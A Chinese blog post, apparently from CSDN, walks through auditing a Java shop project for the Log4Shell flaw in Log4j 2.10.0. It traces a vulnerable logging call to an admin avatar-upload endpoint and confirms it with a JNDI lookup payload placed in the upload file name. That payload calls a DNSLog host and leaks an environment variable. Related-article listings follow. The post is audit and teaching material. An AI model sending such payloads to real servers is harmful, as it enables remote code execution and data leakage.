log4j代码审计及修复方法

最新推荐文章于 2024-08-06 02:53:24 发布
最新推荐文章于 2024-08-06 02:53:24 发布
阅读量1.4k 收藏 1
点赞数 1
分类专栏: java代码审计 文章标签: java代码审计 java 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liguangyao213/article/details/124001636
版权

log4j反序列化审计及修复本项目引入的Log4j版本为2.10.02.0\x26lt;log4j\x26lt;2.14.1 存在CVE-2021-44228漏https://mp.weixin.qq.com/s?__biz=MzI1ODY3MTA3Nw==&mid=2247484178&idx=1&sn=d66b1fd28928084917c81d4ec92ff6bb&chksm=ea05eb98dd72628e24e82d9c30038bb9db4286ad54a1e149cac9bd605288c2bc4675b502807b&token=488023213&lang=zh_CN#rd

本项目引入的Log4j版本为2.10.0

2.0<log4j<2.14.1 存在CVE-2021-44228漏洞

由于Apache Log4j2某些功能存在递归解析,攻击者可在未经身份验证的情况下构造发送带有攻击语句的数据请求包,最终造成在目标服务器上执行任意代码。

其中涉及到的lookup的主要功能就是提供另外一种方式以添加某些特殊的值到日志中,以最大化松散耦合地提供可配置属性供使用者以约定的格式进行调用。

该组件漏洞主要发生在引入的log4j-corelog4j-api是不存在该问题的。log4j-core是源码,log4j-api是接口。

pom.xml文件引入Log4j组件情况如下图所示,引入了log4j-core,以及版本为2.10.0。基本确定存在问题,验证还需进一步寻找能触发的漏洞点。

由于SprinBoot默认自带日志记录框架,一般不需要引入,在pom.xml中剔除出去。如下图所示:

寻找漏洞触发点

简单的说,就是配合log的等级过滤输出比如,你在开发的时候,要验证一个方法有没有被调用到,为了方便调试,通常会在这个方法开始的时候加一些system.out。但是项目真正发布的时候这些代码通常是要移除掉的,所以通常更建议用logger来记录所以你可能会加logger.debug。 为什么是debug而不是info error或者其他呢?因为通常项目发布的时候都会把日志等级设置为error 或者info之类的等级,在这两个等级下debug的内容是输出不了的,所以就可以做到不需要修改代码就不会输出你只有在调试的时候才需要输出的内容各个等级都是有它的含义的,虽然在代码写的时候你用debug info error都是可以,但是为了方便管理,只有调试的时候才用到日志会用debug,一些信息类的日志记录通常会用info(比如你想看一天有几个用户登录),一些错误的,或者异常信息会用error,比如某个时刻数据库连接出了问题,如果分析日志,直接搜索error开头的就能直接定位到了

一共分为五个级别:DEBUG、INFO、WARN、ERROR和FATAL。这五个级别是有顺序的,DEBUG < INFO < WARN < ERROR < FATAL

全局搜索关键字logger,如下图可以看出,本项目使用logger.info级别记录日志方式居多。

大多漏洞分析文章使用logger.error去做调试。两者区别在于默认记录信息不同,这套代码则大部分使用logger.info而两者知识默认记录的内容不一样,至于出发反序列化都是一样的

经过一番探索,发现有几处日志记录拼接了变量参数,让我们看看这些参数是否是从前端传来的。如下图所示:

双击即可进入该代码文件,该文件位于src\main\java\com\xq\tmall\controller\admin\AccountController.java。该代码文件位于Controller层,主要用于和视图交互,处理用户输入的数据等操作。

关键代码如下图所示:

对上述代码进行分析。触发漏洞点的代码为65行的logger.info("获取图片原始文件名:{}", originalFileName);。向上追踪,发现通过file.getOriginalFilename();获取file的文件名后赋值给originalFileName。在向上追踪,file参数来自admin/uploadAdminHeadImage接口,

黑盒验证:

下面就是两种方法:

第一:根据注释提示可以看出来为管理员头像上传功能。

第二:根据代码拼数据包,用一个上传图片的数据包来改

第一种情况:

修改filename=“${jndi:ldap://${env:OS}.b0gbfq.dnslog.cn}”

DNSLog响应

第二种情况:

通过代码拼凑出url:

https://127.0.0.1:8088/tmall/admin/uploadAdminHeadImage

随便找个上传功能抓包,用它的包体

再随便抓一个tmall网站的数据包,用它的包头

将请求改成POST,url替换为拼接出来的,然后更换刚才抓的包头,再改filename

之后使用burp发包,就可以看到dnslog上的数据

不能出网的使用burp通fastjson验证方法

mingzhi61
关注
专栏目录
代码审计-log4j2_rce分析
cdyunaq的博客
12-14 975
前言 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。 2021年12月9日晚,各大公众号突然发布漏洞预警 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞
Java代码审计——apache log4j CVE-2021-45105
王嘟嘟的博客
12-22 2066
0x00 前言 反序列化总纲 因需所以对这个漏洞进行一个简要分析和利用。 0x01 环境 环境使用的还是log4j的基础环境,可以参考Java代码审计——apache log4j 远程命令执行(JNDI) 需要额外在resource目录下创建一个资源文件:log4j.xml <?xml version="1.0" encoding="UTF-8"?> <Configuration status="info"> <Appenders> <Console n
探秘审计日志新纪元:Apache Log4j Audit Sample深度解析
最新发布
gitblog_00037的博客
08-06 482
探秘审计日志新纪元:Apache Log4j Audit Sample深度解析 logging-log4j-audit-sampleMirror of Apache Logging Services项目地址:https://gitcode.com/gh_mirrors/lo/logging-log4j-audit-sample 在追求系统透明度和安全性的今天,审计日志扮演着不可或缺的角色。本文将...
Java.代码审计.log4j2
qq_34012951的博客
02-18 134
2、进入文件搜索log.errro。1、pom文件查看版本
Java代码审计15之Apache log4j2漏洞
划水的小白白
08-31 1556
1、log4j简介 2、复现 2.1、高版本测试 2.2、测试代码 2.3、补充之dns探测 2.3.1、rmi、ldap也可以dnslog探测 2.3.2、dnslog外带信息 3、漏洞原理 3.1、漏洞的危害大的背景 3.2、具体的代码调试 4、靶场测试 4.1、dns探测 4.2、工具下载与使用 4.3、测试 4.4、手工可以测出,部分扫描器扫不到 5、bypass
代码审计.SpringBoot(Tmall).Log4j2漏洞
qq_34012951的博客
02-22 147
1、pom文件查看版本,此版本存在漏洞。3、追溯漏洞参数,定位入口。
log4j2.17.2
04-14
log4j2.17.2漏洞修复程序包详解》 在信息技术领域,日志管理是系统维护和故障排查的重要环节。Log4j作为Java平台广泛使用的日志记录框架,其性能高效、功能强大,深受开发者的青睐。然而,随着技术的发展,安全...
log4j-2.18.0
08-04
然而,这次的2.0及以上版本log4j2中发现的安全漏洞,使得恶意用户能够通过精心构造的输入,触发JNDI(Java Naming and Directory Interface)查找,进而执行任意远程代码。 Log4Shell漏洞的核心在于log4j2的...
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效
06-07
Log4jLog4j2和Fastjson的安全性问题在过去曾引起广泛关注,例如Log4j2的CVE-2021-44228(也被称为Log4Shell漏洞),这是一个远程代码执行漏洞,影响了许多使用Log4j2的系统。这个插件可能就是为了检测和利用这些...
log4j2版本漏洞 修复版本2.16.0
12-17
本文将深入探讨Log4j2漏洞的本质、影响及修复方案,特别关注2.16.0版本的更新内容。 Log4j2是一款广泛使用的Java日志记录框架,由于其灵活性和高效性,在企业级应用中被大量采用。然而,随着 CVE-2021-44228 漏洞的...
log4j.jar各个版本
08-04
apache-log4j-1.2.15.jar, apache-log4j-extras-1.0.jar, apache-log4j-extras-1.1.jar, apache-log4j.jar, log4j-1.2-api-2.0.2-javadoc.jar, log4j-1.2-api-2.0.2-sources.jar, log4j-1.2-api-2.0.2.jar, log4j-1.2.11.jar, log4j-1.2.12.jar, log4j-1.2.13-sources.jar, log4j-1.2.13.jar, log4j-1.2.13.src.jar, log4j-1.2.14-sources.jar, log4j-1.2.14.jar, log4j-1.2.15-sources.jar, log4j-1.2.15.jar, log4j-1.2.16-sources.jar, log4j-1.2.16.jar, log4j-1.2.5.jar, log4j-1.2.6.jar, log4j-1.2.7.jar, log4j-1.2.8.jar, log4j-1.2.9.jar, log4j-1.2.91.jar, log4j-1.2.jar, log4j-1.2rc1.jar, log4j-1.3alpha-7.jar, log4j-api-2.0.2-javadoc.jar, log4j-api-2.0.2-sources.jar, log4j-api-2.0.2.jar, log4j-boot.jar, log4j-bridge-0.9-sources.jar, log4j-bridge-0.9-tests.jar, log4j-bridge-0.9.4-sources.jar, log4j-bridge-0.9.4-tests.jar, log4j-bridge-0.9.4.jar, log4j-bridge-0.9.6-sources.jar, log4j-bridge-0.9.6-tests.jar, log4j-bridge-0.9.6.jar, log4j-bridge-0.9.jar, log4j-config.jar, log4j-core-2.0.2-javadoc.jar, log4j-core-2.0.2-sources.jar, log4j-core-2.0.2-tests.jar, log4j-core-2.0.2.jar, log4j-core.jar, log4j-ext.jar, log4j-flume-ng-2.0.2-javadoc.jar, log4j-flume-ng-2.0.2-sources.jar, log4j-flume-ng-2.0.2.jar, log4j-java1.1.jar, log4j-jcl-2.0.2-javadoc.jar, log4j-jcl-2.0.2-sources.jar, log4j-jcl-2.0.2.jar, log4j-jmx-gui-2.0.2-javadoc.jar, log4j-jmx-gui-2.0.2-sources.jar, log4j-jmx-gui-2.0.2.jar, log4j-nosql-2.0.2-javadoc.jar, log4j-nosql-2.0.2-sources.jar, log4j-nosql-2.0.2.jar, log4j-over-slf4j-1.5.0.jar, log4j-over-slf4j-1.5.10.jar, log4j-over-slf4j-1.5.3.jar, log4j-over-slf4j-1.5.5.jar, log4j-over-slf4j-1.5.6-sources.jar, log4j-over-slf4j-1.5.6.jar, log4j-over-slf4j-1.5.8-sources.jar, log4j-over-slf4j-1.5.8.jar, log4j-over-slf4j-1.6.1.jar, log4j-slf4j-impl-2.0.2-javadoc.jar, log4j-slf4j-impl-2.0.2-sources.jar, log4j-slf4j-impl-2.0.2.jar, log4j-snmp-appender.jar, log4j-taglib-2.0.2-javadoc.jar, log4j-taglib-2.0.2-sources.jar, log4j-taglib-2.0.2.jar, log4j-to-slf4j-2.0.2-javadoc.jar, log4j-to-slf4j-2.0.2-sources.jar, log4j-to-slf4j-2.0.2.jar, log4j-web-2.0.2-javadoc.jar, log4j-web-2.0.2-sources.jar, log4j-web-2.0.2.jar, log4j-wjw.jar, log4j-xml-1.3alpha-7.jar, log4j.jar, org.apache.log4j_1.2.15.v201005080500.jar, org.apache.log4j_1.2.15.v201012070815.jar
log4j代码审计漏洞复现
Python_paipai的博客
05-30 796
首先声明一下,这是一套老源码了,本人只是跟着网上的步骤复现了一遍,主要目的还是面向毫无基础的xd,教学简单的java站怎么自己搭建,不至于代码审计的第一步就废了,本人也是摸着石头过河的,大佬勿喷。file.getOriginalFilename()将会获取表单中name="file"的值,实际情况中"file"是什么值就会获取什么值,往上定位,发现该接口为管理员头像上传接口。注意originalFileName,该变量可控 ,往上看,该变量的值为。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。
Java代码审计——apache log4j 远程命令执行(CVE-2021-44228)
王嘟嘟的博客
12-13 1920
0x00 前言 反序列化总纲 本来是快乐游戏时间的,但是突然就出来这个洞了= =,当然这个突然用的比较夸张了,修复时间应该是在五天前了。 本着学习的态度来进行一下简单的分析。 0x01 环境 首先是pom <dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>lo
JavaWeb代码审计实战之迷你天猫商城系统详细分析版,实战应用级系统的Log4j2shell代码审计
Power7089的博客
08-22 2155
JavaWeb代码审计实战之迷你天猫商城系统详细分析版,实战应用级系统的Log4j2shell代码审计
Log4j2 远程代码执行漏洞复现
龙卷风摧毁停车场
12-20 3122
Log4j2.14前版本,漏洞浮现
Java框架安全篇--log4j2远程代码执行漏洞
m0_63138919的博客
04-06 1413
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主师傅大佬勿喷,还希望大家指出错误
log4j漏洞复现(CVE-2021-44228)
qq_32445755的博客
01-13 587
Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。
log4j2.xml配置日志写入数据库
moon
06-14 9870
之前写过通过logback.xml配置将日志写入数据库的文章,本章中公司项目中使用的则是log4j2.xml,本来以为很容易实现,结果费了一下午时间才搞定,记录一下。 一、在本地新建库auge_log,在该库中新建表error_log DROP TABLE IF EXISTS `error_log`; CREATE TABLE `error_log` ( `log_id` int(20)...
Log4j2漏洞修复:关键jar文件更新指南
资源摘要信息:"解决Apache Log4j远程代码执行漏洞的log4j2部分jar文件包括log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar。" 在深入了解这些jar文件之前,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mingzhi61

你的打赏,是我创造最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值